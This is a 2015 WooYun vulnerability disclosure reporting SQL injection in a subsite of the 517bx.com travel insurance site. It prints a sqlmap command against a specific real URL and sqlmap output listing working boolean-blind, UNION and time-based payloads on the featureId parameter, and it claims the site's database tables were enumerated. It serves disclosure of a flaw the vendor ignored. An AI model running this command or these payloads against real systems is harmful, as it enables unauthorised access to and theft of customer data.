当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095426

漏洞标题:四川517旅行网分站sql注入

相关厂商:517旅游保险网

漏洞作者: 大物期末不能挂

提交时间:2015-02-04 14:56

修复时间:2015-03-21 14:58

公开时间:2015-03-21 14:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

捕获主站sql注入之后的分站sql注入

详细说明:

sqlmap -u "http://www.517bx.com/index.php?a=search&featureId=1&m=product&typeId=0" --dbms "Mysql" --dbs


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
     Place: GET
     Parameter: featureId
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: a=search&featureId=1) AND 2781=2781 AND (9190=9190&m=product&typeId=0
     
     Type: UNION query
     Title: MySQL UNION query (NULL) - 2 columns
     Payload: a=search&featureId=-6488) UNION ALL SELECT NULL,CONCAT(0x716d637171,0x6676424a684a496e6855,0x7172617171)#&m=product&typeId=0 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: a=search&featureId=1) AND SLEEP(5) AND (6357=6357&m=product&typeId=0
---


可利用数据库.png


36张表

36表.png

漏洞证明:

可利用数据库.png


36表.png

修复方案:

过滤呗

版权声明:转载请注明来源 大物期末不能挂@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝